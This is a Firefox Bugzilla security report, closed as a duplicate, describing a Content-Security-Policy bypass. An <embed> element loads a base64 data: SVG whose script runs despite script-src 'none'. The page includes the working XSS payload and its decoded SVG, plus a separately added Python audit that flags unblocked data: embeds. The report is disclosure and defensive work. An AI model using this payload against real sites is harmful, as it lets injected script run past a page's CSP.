Closed
Bug 1550499
Opened 6 years ago
Closed 6 years ago
CSP bypass use embed tag
Categories
(Core :: DOM: Security, defect)
Core
DOM: Security
Tracking
RESOLVED
DUPLICATE
of bug 1457100
People
(Reporter: whitehat002, Unassigned)
References
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(1 file)
160.92 KB,
image/png
At present, there are some problems with this tag. You can't get related information such as domain or cookie, but you can bypass CSP and execute XSS.
XSS payload
<meta http-equiv="Content-Security-Policy" content="script-src 'none'">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoL2NzcCBieXBhc3MvKTs8L3NjcmlwdD48L3N2Zz4=" AllowScriptAccess="always"></EMBED>
Flags: sec-bounty?
Comment 1•6 years ago
For reference, the SVG provided is:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
<script type="text/ecmascript">alert(/csp bypass/);</script>
</svg>
This seems like it's effectively the same as bug 1550414.
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Security
Product: Firefox → Core
See Also: → 1550414
Updated•6 years ago
Type: task → defect
Yes, maybe the same as #1550414, only the labels used are different.
Comment 3•6 years ago
Slightly different: <embed> and <object> need to inherit the parent document's CSP (as <iframe> does) for data: URLs.
Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
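Added example, not from this bug or from the Firefox code base: a small Python audit that reads a page's meta CSP and reports any <embed>/<object> pointing at a data: URL that the policy's object-src (falling back to default-src, as CSP specifies) does not block. It shows why the report's script-src 'none' policy alone leaves the plugin element unrestricted; the sample HTML and the hardened variant are constructed here.

```python
from html.parser import HTMLParser

class CspPluginAudit(HTMLParser):
    """Collect the <meta http-equiv="Content-Security-Policy"> policy and every
    <embed>/<object> whose src/data attribute is a data: URL."""
    def __init__(self):
        super().__init__()
        self.policy = None
        self.data_plugins = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "content-security-policy":
            self.policy = a.get("content", "")
        elif tag in ("embed", "object"):
            url = (a.get("src") or a.get("data") or "").strip()
            if url.lower().startswith("data:"):
                self.data_plugins.append(tag)

def parse_csp(policy):
    """Split a serialized policy into {directive: [source expressions]}; a repeated
    directive is ignored, as CSP keeps only the first occurrence."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), [t.lower() for t in tokens[1:]])
    return directives

def plugin_sources(directives):
    """object-src governs <embed>/<object>; when absent it falls back to default-src.
    Returns None when neither is present, i.e. plugin content is unrestricted."""
    if "object-src" in directives:
        return directives["object-src"]
    return directives.get("default-src")

def allows_data_plugins(sources):
    """A data: URL matches only an explicit data: scheme-source; '*' and 'self' do not."""
    return sources is None or "data:" in sources

def audit(html):
    """One finding per <embed>/<object> with a data: URL that the page's policy leaves open."""
    p = CspPluginAudit()
    p.feed(html)
    if not allows_data_plugins(plugin_sources(parse_csp(p.policy or ""))):
        return []
    return [f"<{tag}> loads a data: URL but object-src/default-src does not block it"
            for tag in p.data_plugins]

# Constructed sample: the report's policy (script-src 'none') beside a data: SVG embed.
SAMPLE = ('<meta http-equiv="Content-Security-Policy" content="script-src \'none\'">'
          '<EMBED SRC="data:image/svg+xml,%3Csvg%3E%3C/svg%3E"></EMBED>')
HARDENED = SAMPLE.replace("script-src 'none'", "script-src 'none'; object-src 'none'")
```

Run `audit(SAMPLE)` to see the finding and `audit(HARDENED)` to see it disappear once object-src is set.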
Although this vulnerability is repeated, will this vulnerability be fixed?
Comment 5•6 years ago
(In reply to hackyzh from comment #4)
Although this vulnerability is repeated, will this vulnerability be fixed?
At some point.
This is not a bounty eligible report.
Flags: sec-bounty? → sec-bounty-
Updated•2 years ago
Group: dom-core-security
Updated•6 months ago
Keywords: reporter-external